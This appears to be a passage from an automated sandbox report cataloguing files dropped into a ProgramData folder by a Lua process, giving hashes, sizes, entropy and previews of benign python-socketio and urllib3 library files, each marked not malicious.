SHA1:	A38BF5EA85BC1C40349F9720BA2CF8E09C5DF8E6
SHA-256:	E0718AD12FB7038BBA6D48CE96B603777D9037066604CE674852688FC2ADB8B8
SHA-512:	DFF19D309A819924D2826CE9CB7E82BF0A87C4666452B0E2D585F73657660368AA3DCB8BF57A9A450D712DBBD2B04C5F740D3CC97294946461D9B473182736EB
Malicious:	false
Preview:	import itertools.import logging..import six..default_logger = logging.getLogger('socketio')...class BaseManager(object):. """Manage client connections... This class keeps track of all the clients and the rooms they are in, to. support the broadcasting of messages. The data used by this class is. stored in a memory structure, making it appropriate only for single process. services. More sophisticated storage backends can be implemented by. subclasses.. """. def __init__(self):. self.logger = None. self.server = None. self.rooms = {}. self.callbacks = {}. self.pending_disconnect = {}.. def set_server(self, server):. self.server = server.. def initialize(self):. """Invoked before the first request is received. Subclasses can add. their initialization code here.. """. pass.. def get_namespaces(self):. """Return an iterable with the active namespace names.""". return six.iter

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\client.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	27867
Entropy (8bit):	4.210378657828437
Encrypted:	false
SSDEEP:	384:OuHHkFlm4/Usl0q/NXl0LzPHsw3kcB8r6R5nw:OuHIlm4/Usl0q/tl0L6c5R5nw
MD5:	30C01BC44B4FE70271F3A6A003104FF8
SHA1:	B1BFC09BF75EE937800AD151AE5C935FDFB448B5
SHA-256:	DA08158CFAB449509466A6C60DDED7F9C1E5C0B5EBAC14D3E62565FDDB00B74D
SHA-512:	E4B6E9AED1A8E1331510075EFF0785AE03EC0FD5A98D08C69FEDFCEF385D8D20FB5A592786BFB07AC8E1FF9B5828FA55C6D2E27AD3F519727AE1EB951ECE9B11
Malicious:	false
Preview:	import itertools.import logging.import random.import signal.import threading..import engineio.import six..from . import exceptions.from . import namespace.from . import packet..default_logger = logging.getLogger('socketio.client').reconnecting_clients = []...def signal_handler(sig, frame): # pragma: no cover. """SIGINT handler... Notify any clients that are in a reconnect loop to abort. Other. disconnection tasks are handled at the engine.io level.. """. for client in reconnecting_clients[:]:. client._reconnect_abort.set(). return original_signal_handler(sig, frame)...original_signal_handler = None...class Client(object):. """A Socket.IO client... This class implements a fully compliant Socket.IO web client with support. for websocket and long-polling transports... :param reconnection: ``True`` if the client should automatically attempt to. reconnect to the server after an interruption, or. ``False``

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\exceptions.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	729
Entropy (8bit):	4.438768491882087
Encrypted:	false
SSDEEP:	12:9cPRU3mx8X2N5OlL9N67XXQL669X51ANtcPFHZ6EWV9vKih:YPx8mi9lLFXDA0PhZTWVxKih
MD5:	A3DB57C742C05EA2617EFC03849E46BD
SHA1:	B49DD265E847F7A70BC92F7F32A8B924D3FB9554
SHA-256:	ECBE25656FCCA2842A7DA85D5C4F27C49106DA62A33BAB3C471BC9B889D845F1
SHA-512:	E3BB466FF1D60C2FAC02507C309FCDF3A428E4993E1639B890D4376138619BD58FD388D181731EEA532E6984D4AF34A6363835EE39C3540BE775ACF075180183
Malicious:	false
Preview:	class SocketIOError(Exception):. pass...class ConnectionError(SocketIOError):. pass...class ConnectionRefusedError(ConnectionError):. """Connection refused exception... This exception can be raised from a connect handler when the connection. is not accepted. The positional arguments provided with the exception are. returned with the error packet to the client.. """. def __init__(self, *args):. if len(args) == 0:. self.error_args = None. elif len(args) == 1 and not isinstance(args[0], list):. self.error_args = args[0]. else:. self.error_args = args...class TimeoutError(SocketIOError):. pass...class BadNamespaceError(SocketIOError):. pass.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\kafka_manager.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2234
Entropy (8bit):	4.378853658027296
Encrypted:	false
SSDEEP:	48:6bgtG2Rq1zMOwpvINrmKVPcwLMsIwABwBxPEW:5U1z1wpvEG/VRcEW
MD5:	CE718EC475CE4950AE905ED00F7F8F41
SHA1:	7464F1B4ED753AB186EB4D23B13F80B26E5C39B6
SHA-256:	CF27135FB3F9D9E319F7BA1F7FEE166BF2F1ED1A11E888E6876A44EF474BE80A
SHA-512:	5D410701684703E5DF97CECE5BCC9EA2D4AEDE946722C2640888DB733A4433860B974E49274980488BEC5E77BB9A637B662500F6E0745AAB86B7F07F7443DB79
Malicious:	false
Preview:	import logging.import pickle..try:. import kafka.except ImportError:. kafka = None..from .pubsub_manager import PubSubManager..logger = logging.getLogger('socketio')...class KafkaManager(PubSubManager): # pragma: no cover. """Kafka based client manager... This class implements a Kafka backend for event sharing across multiple. processes... To use a Kafka backend, initialize the :class:`Server` instance as. follows::.. url = 'kafka://hostname:port'. server = socketio.Server(client_manager=socketio.KafkaManager(url)).. :param url: The connection URL for the Kafka server. For a default Kafka. store running on the same host, use ``kafka://``.. :param channel: The channel name (topic) on which the server sends and. receives notifications. Must be the same in all the. servers.. :param write_only: If set ot ``True``, only initialize to emit events. The. default of ``False``

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\kombu_manager.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5298
Entropy (8bit):	4.39764620135034
Encrypted:	false
SSDEEP:	96:dcdCNu9n1PZaw1FgFhFGFbyd97t3IoEeNbSnXs/VhPu:W1Z1RZHgr3IoEeNbSnf
MD5:	CB111C7A03EF5806E2646B71F49AB4F3
SHA1:	20FD477CCECCCBE6DC31FAF479F04259DF156210
SHA-256:	35E82B4B749287BF0F71BF9A350CE668AF7466DE04A566C541B78906A58851E3
SHA-512:	31322F15C278EADE37F3F410D4C1A45EBDA822269C3497B6BF410CCD3AADE8AD876EA13DC4E6B34C8C7047A002B2DE486754E4384605F5D51A47C64C7295C3C6
Malicious:	false
Preview:	import pickle.import uuid..try:. import kombu.except ImportError:. kombu = None..from .pubsub_manager import PubSubManager...class KombuManager(PubSubManager): # pragma: no cover. """Client manager that uses kombu for inter-process messaging... This class implements a client manager backend for event sharing across. multiple processes, using RabbitMQ, Redis or any other messaging mechanism. supported by `kombu <http://kombu.readthedocs.org/en/latest/>`_... To use a kombu backend, initialize the :class:`Server` instance as. follows::.. url = 'amqp://user:password@hostname:port//'. server = socketio.Server(client_manager=socketio.KombuManager(url)).. :param url: The connection URL for the backend messaging queue. Example. connection URLs are ``'amqp://guest:guest@localhost:5672//'``. and ``'redis://localhost:6379/'`` for RabbitMQ and Redis. respectively. Consult the `kombu documentation.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\middleware.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1712
Entropy (8bit):	4.305523318129909
Encrypted:	false
SSDEEP:	24:x0T0/phWIBDuWBWLrnou/QWrGPUQ823XcNSv86hLKpWA9nRY4uJyPsx9AmtmYt:xW0nDfALs7YGQJQv86spWH4uJyqNht
MD5:	A54CE10DEC3893970F9438A171507FC2
SHA1:	9A91CA679C96FA45D0B7AB5F8739B850024AB5C6
SHA-256:	D4F3170EA9097466531D0693477A3DB675920AC529D770498990E419378CE3AF
SHA-512:	2CECBE3CD27F4D4CB21E044A584510220455C64A65CC09394F6578851D88AB78928FCBE72A8D276B551003663A17CC3836CE3B7268C49E172A6710A02CB73816
Malicious:	false
Preview:	import engineio...class WSGIApp(engineio.WSGIApp):. """WSGI middleware for Socket.IO... This middleware dispatches traffic to a Socket.IO application. It can also. serve a list of static files to the client, or forward unrelated HTTP. traffic to another WSGI application... :param socketio_app: The Socket.IO server. Must be an instance of the. ``socketio.Server`` class.. :param wsgi_app: The WSGI app that receives all other traffic.. :param static_files: A dictionary with static file mapping rules. See the. documentation for details on this argument.. :param socketio_path: The endpoint where the Socket.IO application should. be installed. The default value is appropriate for. most cases... Example usage::.. import socketio. import eventlet. from . import wsgi_app.. sio = socketio.Server(). app = socketio.WSGIApp(sio, wsgi_app).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\namespace.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7929
Entropy (8bit):	4.219885831320909
Encrypted:	false
SSDEEP:	96:9FxmMjLr5ecEkbEV65FmWSXM+TSP57s+gffEQDwG1YMLxRDQxsmxtqfMvgYEV65f:dmMjLFJaUNr+TiW+5bR6UdnTiWP
MD5:	041B31956ADB6EA4E6D243C981E5075D
SHA1:	27C6508B0F3828374993DC0ABE15755F8173FFC2
SHA-256:	C4282A084A07CE8D69AF796D965BFDE97C3DB5C73DF3911D0C76CF2297C2253F
SHA-512:	4FCC41172F9C738233949BA4F1BF37E6F069E71007B961A89607CEC1B37C363C8E010776FF07548D0B7FE11EEB7A49DF50C50191F132D7737EDE8CAAEA3F117C
Malicious:	false
Preview:	class BaseNamespace(object):. def __init__(self, namespace=None):. self.namespace = namespace or '/'.. def is_asyncio_based(self):. return False.. def trigger_event(self, event, args):. """Dispatch an event to the proper handler method... In the most common usage, this method is not overloaded by subclasses,. as it performs the routing of events to methods. However, this. method can be overriden if special dispatching rules are needed, or if. having a single method that catches all events is desired.. """. handler_name = 'on_' + event. if hasattr(self, handler_name):. return getattr(self, handler_name)(args)...class Namespace(BaseNamespace):. """Base class for server-side class-based namespaces... A class-based namespace is a class that contains all the event handlers. for a Socket.IO namespace. The event handlers are methods of the class. with the prefix ``on_``, such as ``on_connec

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\packet.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6803
Entropy (8bit):	4.2711395275560164
Encrypted:	false
SSDEEP:	192:4rpFmxSJRaRQqTdT8jV5Q28dAwk1d88dKyd/p5dgpmb8d1idU:MFmxocRQIdIh50k1NT8
MD5:	066F0D9BB72313EC3E7BF1AA6A9DA874
SHA1:	5D2B28B985C7C8D1625F7B67382A845C052CCE7E
SHA-256:	71A3B00110BF1315F3A377223261B9BA63B63EBAAF7C3035A2912E9B2551CA4B
SHA-512:	E3E9B98D1FBE60E189B94866C43766F5D370B29799511FE74D69C36659CA1A1F852B055F59175DE1538E09A4276F13C627CB7263AE57386CAE1B2151C8472DAD
Malicious:	false
Preview:	import functools.import json as _json..import six..(CONNECT, DISCONNECT, EVENT, ACK, ERROR, BINARY_EVENT, BINARY_ACK) = \. (0, 1, 2, 3, 4, 5, 6).packet_names = ['CONNECT', 'DISCONNECT', 'EVENT', 'ACK', 'ERROR',. 'BINARY_EVENT', 'BINARY_ACK']...class Packet(object):. """Socket.IO packet.""".. # the format of the Socket.IO packet is as follows:. #. # packet type: 1 byte, values 0-6. # num_attachments: ASCII encoded, only if num_attachments != 0. # '-': only if num_attachments != 0. # namespace: only if namespace != '/'. # ',': only if namespace and one of id and data are defined in this packet. # id: ASCII encoded, only if id is not None. # data: JSON dump of data payload.. json = _json.. def __init__(self, packet_type=EVENT, data=None, namespace=None, id=None,. binary=None, encoded_packet=None):. self.packet_type = packet_type. self.data = data. self.namespace = namespace. self.id = id.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\pubsub_manager.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7178
Entropy (8bit):	4.164215766998458
Encrypted:	false
SSDEEP:	96:viL8KCSUq/dosJU8sPW4cGxEMUIW//2nxrppnZx8rVuOEfzrJ/:vpKCS/3DsPW4sHKXZx8rA1
MD5:	D589CEEE17F103031E659DD6B97883AA
SHA1:	0B8EC2B13A85DAC9D5C020F9A707B59E27802298
SHA-256:	8D47E67D97EB38BE528ADBBA648F98742A068A4FBC67D929F5D61AF119D9A5E1
SHA-512:	D513C968401B008AD813DF4480E721B74C35CA96E2A5B1B170523D1C74F0C73B77388157004C203F93B91F2516827CA93AECE12BBCB8C5513EC4D6A6D82BC872
Malicious:	false
Preview:	from functools import partial.import uuid..import json.import pickle.import six..from .base_manager import BaseManager...class PubSubManager(BaseManager):. """Manage a client list attached to a pub/sub backend... This is a base class that enables multiple servers to share the list of. clients, with the servers communicating events through a pub/sub backend.. The use of a pub/sub backend also allows any client connected to the. backend to emit events addressed to Socket.IO clients... The actual backends must be implemented by subclasses, this class only. provides a pub/sub generic framework... :param channel: The channel name on which the server sends and receives. notifications.. """. name = 'pubsub'.. def __init__(self, channel='socketio', write_only=False, logger=None):. super(PubSubManager, self).__init__(). self.channel = channel. self.write_only = write_only. self.host_id = uuid.uuid4().hex. sel

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\redis_manager.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4446
Entropy (8bit):	4.182138099594556
Encrypted:	false
SSDEEP:	96:exCQA/1icFq1uWDoEeNbScgGHYyH6rpKFl:sCQiibRDoEeNbScgrq
MD5:	EC1BE2B9EF0C5F7CA2CE78C03E6DDA59
SHA1:	1FD510B7183AB722CD10C13D65D5BDAFC9F50744
SHA-256:	F9E6BE80BB0B19D95B4BC70F808649DCB96DEDB7593EC07EB2D9A839CBBF68D7
SHA-512:	E30815248CF3FAAED9F4AE9ECE9E824D16742539A42AC073B1497B62E3BE71044D17FF881240C49AADCC000C925A0A5ADA129680756F94CF3EE3E48961F9B8C7
Malicious:	false
Preview:	import logging.import pickle.import time..try:. import redis.except ImportError:. redis = None..from .pubsub_manager import PubSubManager..logger = logging.getLogger('socketio')...class RedisManager(PubSubManager): # pragma: no cover. """Redis based client manager... This class implements a Redis backend for event sharing across multiple. processes. Only kept here as one more example of how to build a custom. backend, since the kombu backend is perfectly adequate to support a Redis. message queue... To use a Redis backend, initialize the :class:`Server` instance as. follows::.. url = 'redis://hostname:port/0'. server = socketio.Server(client_manager=socketio.RedisManager(url)).. :param url: The connection URL for the Redis server. For a default Redis. store running on the same host, use ``redis://``.. :param channel: The channel name on which the server sends and receives. notifications. Must be the same

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\server.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	36079
Entropy (8bit):	4.139759593015352
Encrypted:	false
SSDEEP:	768:sLwC8Klm+nhlhBJvl1lwEE+3yL/3w10Th8I:sLv8KlmAhlh7vl1CEE+3yLZ
MD5:	1C01DBAF5D9972515001110006FAAE03
SHA1:	049F9DB0832827D6CC8155E832951D9A6B37C1F4
SHA-256:	8F37225EBB4B3708937041F5BD7A6C5ACBAF8C8639ADF5584B832464210880F4
SHA-512:	D45CABA5458C719C1264B12D9ECC2056627ED9187C53C02234B2FEBE583D4F8A16F2BC658E519049579D886C48A19A1D487370FFF0B2D047C7ECF6F2CCEBE563
Malicious:	false
Preview:	import logging..import engineio.import six..from . import base_manager.from . import exceptions.from . import namespace.from . import packet..default_logger = logging.getLogger('socketio.server')...class Server(object):. """A Socket.IO server... This class implements a fully compliant Socket.IO web server with support. for websocket and long-polling transports... :param client_manager: The client manager instance that will manage the. client list. When this is omitted, the client list. is stored in an in-memory structure, so the use of. multiple connected servers is not possible.. :param logger: To enable logging set to ``True`` or pass a logger object to. use. To disable logging set to ``False``. The default is. ``False``. Note that fatal errors are logged even when. ``logger`` is ``False``.. :param binary: ``True`` to support binary pay

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\tornado.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	357
Entropy (8bit):	4.360872576306305
Encrypted:	false
SSDEEP:	6:kf+uQcFAlcsSnX0TxN30dzJMpLXaUmw3DEWtbJeK8w3CpVJeKv:kf+ubAl5S2NuuRSw3xGw3Cph
MD5:	91FAD73DDB9CA9744B8255F51514FC4D
SHA1:	CC2F9448B090FD4A51A343606B441A99EAAB6A80
SHA-256:	D8EE11532670EC2813058B26732FBB48660D9E0CF6F22A8E2779B5FF30C1CF55
SHA-512:	CD3309C200BB1CAB463A343EB9B623CC12A454CE69EA717CE4F3E2D70E649EB5E833DE41A27C7E9615F7E4A4594FF0D8D475262BBCABC052A2DF0FF3EC4DC49C
Malicious:	false
Preview:	import sys.if sys.version_info >= (3, 5):. try:. from engineio.async_drivers.tornado import get_tornado_handler as \. get_engineio_handler. except ImportError: # pragma: no cover. get_engineio_handler = None...def get_tornado_handler(socketio_server): # pragma: no cover. return get_engineio_handler(socketio_server.eio).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\zmq_manager.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3682
Entropy (8bit):	4.364302431835137
Encrypted:	false
SSDEEP:	96:GmMWohEZTENDSgODawXUD7WqQgq3d+wxkPf7ov:V5ohEZTENDSggNUD7WqQgqt+IZ
MD5:	9D46A516BFC525284639FC1D7676FB96
SHA1:	7BEDD369EAF7991BA085543219BE4BC780E2B40A
SHA-256:	7A47450767C41AAF302B8497ED271384B64F99983BE31C3E7B9F62638FB08502
SHA-512:	655519144CD0037D421021947DDD0872FC5A02415B07ADC346608D430B27693CFE49D39FD2931615A8318E41F6ACBCD43A3BF6AE30BE94A310869D93C3617CDD
Malicious:	false
Preview:	import pickle.import re..try:. import eventlet.green.zmq as zmq.except ImportError:. zmq = None.import six..from .pubsub_manager import PubSubManager...class ZmqManager(PubSubManager): # pragma: no cover. """zmq based client manager... NOTE: this zmq implementation should be considered experimental at this. time. At this time, eventlet is required to use zmq... This class implements a zmq backend for event sharing across multiple. processes. To use a zmq backend, initialize the :class:`Server` instance as. follows::.. url = 'zmq+tcp://hostname:port1+port2'. server = socketio.Server(client_manager=socketio.ZmqManager(url)).. :param url: The connection URL for the zmq message broker,. which will need to be provided and running.. :param channel: The channel name on which the server sends and receives. notifications. Must be the same in all the servers.. :param write_only: If set to ``True``, only initialize

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3-1.26.2.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3-1.26.2.dist-info\LICENSE.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1115
Entropy (8bit):	5.127299110271462
Encrypted:	false
SSDEEP:	24:Wt4VrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:y4VaJHlxE3dQHOs5exm3ogFh
MD5:	C2823CB995439C984FD62A973D79815C
SHA1:	FAE7D86A68E1724238ED64674E4CD743A7DC6796
SHA-256:	C37BF186E27CF9DBE9619E55EDFE3CEA7B30091CEB3DA63C7DACBE0E6D77907B
SHA-512:	F269AA02054A723686EA1D5C3CE47A90AB4D816CB1FADD4213D2174C6EB0E9973D0FC8EA85FB49C59EED378B2BDFA97A6E66373A9B495FEF4ABE0593C4E0C790
Malicious:	false
Preview:	MIT License..Copyright (c) 2008-2020 Andrey Petrov and contributors (see CONTRIBUTORS.txt)..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT O

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3-1.26.2.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	42982
Entropy (8bit):	5.160749246559012
Encrypted:	false
SSDEEP:	768:wi/fty2KwQBXpXtJSD4FHqu5QlXg0Gp+1Is2trOa+rbm0wjtUGCd:wi3tXKzs4r+QYIs2tKqRUD
MD5:	524C4F24A0070AB98476119050DA6DAD
SHA1:	BD5E0EA5577D9649AAF9F9D1871050BDC7D2D036
SHA-256:	3DA2446E1956304E120223D6022C06C65D348F62CEDE9DC5413E1691F3810A6A
SHA-512:	ABC20DBBC61FDBCE3FD5D9C59A0346AA09B7541E28EAD84951090E2830A1DB6E2E2E670ED2522F5A7EA715A34B6A7F72192EEF0A6AFFA01E47E22CE97185F2D8
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: urllib3.Version: 1.26.2.Summary: HTTP library with thread-safe connection pooling, file post, and more..Home-page: https://urllib3.readthedocs.io/.Author: Andrey Petrov.Author-email: andrey.petrov@shazow.net.License: MIT.Project-URL: Documentation, https://urllib3.readthedocs.io/.Project-URL: Code, https://github.com/urllib3/urllib3.Project-URL: Issue tracker, https://github.com/urllib3/urllib3/issues.Keywords: urllib httplib threadsafe filepost http https ssl pooling.Platform: UNKNOWN.Classifier: Environment :: Web Environment.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.7.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.5.Classifier: Programming Language :: Python :: 3.6.Classif

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3-1.26.2.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5962
Entropy (8bit):	5.676154013729213
Encrypted:	false
SSDEEP:	96:ZXOWlroneDr1iaJMRUUOhiJjhUhFShvhNo9hpWBIaUQ1iWTsoYJ+H+sJkfnbnCFE:ZXHp+biKMJdf
MD5:	21F339559C9773C91160FABF67E7B66C
SHA1:	278EBE67B544FC6942E94F6881E37F7EBE23F44F
SHA-256:	250AA0D26F14247EE00D00ACCA6FCC17D5A7B8109534793299E79058BDA5C402
SHA-512:	65A2A8C69DFF250443909F4F80EAF0904ABF1D964F68A66628494FA4002778601A334EF8C295C29046BA226F35513C91F07CF0E400DD8F568BA179413992903E
Malicious:	false
Preview:	urllib3-1.26.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..urllib3-1.26.2.dist-info/LICENSE.txt,sha256=w3vxhuJ8-dvpYZ5V7f486nswCRzrPaY8fay-Dm13kHs,1115..urllib3-1.26.2.dist-info/METADATA,sha256=PaJEbhlWME4SAiPWAiwGxl00j2LO3p3FQT4WkfOBCmo,42982..urllib3-1.26.2.dist-info/RECORD,,..urllib3-1.26.2.dist-info/WHEEL,sha256=ADKeyaGyKF5DwBNE0sRE5pvW-bSkFMJfBuhzZ3rceP4,110..urllib3-1.26.2.dist-info/top_level.txt,sha256=EMiXL2sKrTcmrMxIHTqdc3ET54pQI2Y072LexFEemvo,8..urllib3/__init__.py,sha256=j3yzHIbmW7CS-IKQJ9-PPQf_YKO8EOAey_rMW0UR7us,2763..urllib3/__pycache__/__init__.cpython-37.pyc,,..urllib3/__pycache__/_collections.cpython-37.pyc,,..urllib3/__pycache__/_version.cpython-37.pyc,,..urllib3/__pycache__/connection.cpython-37.pyc,,..urllib3/__pycache__/connectionpool.cpython-37.pyc,,..urllib3/__pycache__/exceptions.cpython-37.pyc,,..urllib3/__pycache__/fields.cpython-37.pyc,,..urllib3/__pycache__/filepost.cpython-37.pyc,,..urllib3/__pycache__/poolmanager.cpython-37.py

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3-1.26.2.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.816968543485036
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVii6KRRP+tPCCf7irO5S:RtBMwlViGjWBBwt
MD5:	D25A99ECD1ECB535EE4E31874B0C7B95
SHA1:	B80780FBBF97A5FBF433C4F692E340632EA675F1
SHA-256:	00329EC9A1B2285E43C01344D2C444E69BD6F9B4A414C25F06E873677ADC78FE
SHA-512:	539E072414E6E8AD3BFAEDB0587507443B39826814FB330B57D605FB5FBE61134D3548359F41A14CC63B44E23EF0AA1E62EA1C4A2F3B344BE548F4C2C8143976
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.35.1).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3-1.26.2.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:CJCIn:CsI
MD5:	087F6EEE1869B57050854932A65308C3
SHA1:	15576C12AE90688527CF229FEF8B0074F4B87D44
SHA-256:	10C8972F6B0AAD3726ACCC481D3A9D737113E78A50236634EF62DEC4511E9AFA
SHA-512:	06CE125869FC98C17B507A716296A3056C232406389C51CDDC555E2BC5612F8B28F2C718C6BC726188C73523CBD7426999665D4786280ECA0B935ADBA9BA7F15
Malicious:	false
Preview:	urllib3.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2763
Entropy (8bit):	4.82855851370814
Encrypted:	false
SSDEEP:	48:P9QYvYivdtJbow7dCox+XfV2oAkVHbY30nFp+6Hsxs3LMqsAxsavC28qs38:P9QpivZboOIow92oAkVHW0nFp+Gsxs3H
MD5:	FD4AC96F1CC3E70176F11D8EED9C03D0
SHA1:	392F6A8DF65DABFAE6CC45254ECECA34C2AC2D0E
SHA-256:	8F7CB31C86E65BB092F8829027DF8F3D07FF60A3BC10E01ECBFACC5B4511EEEB
SHA-512:	88479A5E61197E8F4F93FC99AFC84602521622B00B37516E72B3EDD37537BBCA005562EDFDB0B78028598795F0477BE92434112958654740BF80EA93D7724868
Malicious:	false
Preview:	""".Python HTTP library with thread-safe connection pooling, file post support, user friendly, and more.""".from __future__ import absolute_import..# Set default logging handler to avoid "No handler found" warnings..import logging.import warnings.from logging import NullHandler..from . import exceptions.from ._version import __version__.from .connectionpool import HTTPConnectionPool, HTTPSConnectionPool, connection_from_url.from .filepost import encode_multipart_formdata.from .poolmanager import PoolManager, ProxyManager, proxy_from_url.from .response import HTTPResponse.from .util.request import make_headers.from .util.retry import Retry.from .util.timeout import Timeout.from .util.url import get_host..__author__ = "Andrey Petrov (andrey.petrov@shazow.net)".__license__ = "MIT".__version__ = __version__..__all__ = (. "HTTPConnectionPool",. "HTTPSConnectionPool",. "PoolManager",. "ProxyManager",. "HTTPResponse",. "Retry",. "Timeout",. "add_stderr_logger",. "co

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\_collections.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10811
Entropy (8bit):	4.417580601911852
Encrypted:	false
SSDEEP:	192:uigwjMrDy91VrSp14/JPDc7R6w3R8RPI1dZ:LghuI14/JLs6AePkH
MD5:	C00034CAB38BB125F7FF7FA9FF99A5B8
SHA1:	48AA9B3F4621CB54B901F789D8E596122AB98898
SHA-256:	469D6657206073F52501CA7A3376ADD6C909057479278DCD6B0453BD6DA0FD76
SHA-512:	36B4442CDBF73E54AA3ED89C1464F1996B30C9A2C71B6E23F9529137CD988506D6C094451B34054537D111887E391248C8806E7DCFFF832956B4B9AEE234CC18
Malicious:	false
Preview:	from __future__ import absolute_import..try:. from collections.abc import Mapping, MutableMapping.except ImportError:. from collections import Mapping, MutableMapping.try:. from threading import RLock.except ImportError: # Platform-specific: No threads available.. class RLock:. def __enter__(self):. pass.. def __exit__(self, exc_type, exc_value, traceback):. pass...from collections import OrderedDict..from .exceptions import InvalidHeader.from .packages import six.from .packages.six import iterkeys, itervalues..__all__ = ["RecentlyUsedContainer", "HTTPHeaderDict"]..._Null = object()...class RecentlyUsedContainer(MutableMapping):. """. Provides a thread-safe dict-like container which maintains up to. ``maxsize`` keys while throwing away the least-recently-used keys beyond. ``maxsize``... :param maxsize:. Maximum number of recent elements to retain... :param dispose_func:. Every time an item is evicted from

C:\ProgramData\ShellExperienceHost\Lib\site-packages\urllib3\_version.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	63
Entropy (8bit):	4.765144558791974
Encrypted:	false
SSDEEP:	3:SbFQmvCEmqhqO2i6TAXLvsD7vn:SbFmEdgOH4A7sDr
MD5:	E862C0F9E1A0A8F2776FC2E9652F4A9E
SHA1:	051CEB0151C9E3B8DA983A67E1FDF76D246F8CB0
SHA-256:	79E38B0358830B7EA94EF282F7CA5848240CA56ECF06467982E5478C637DA2AC
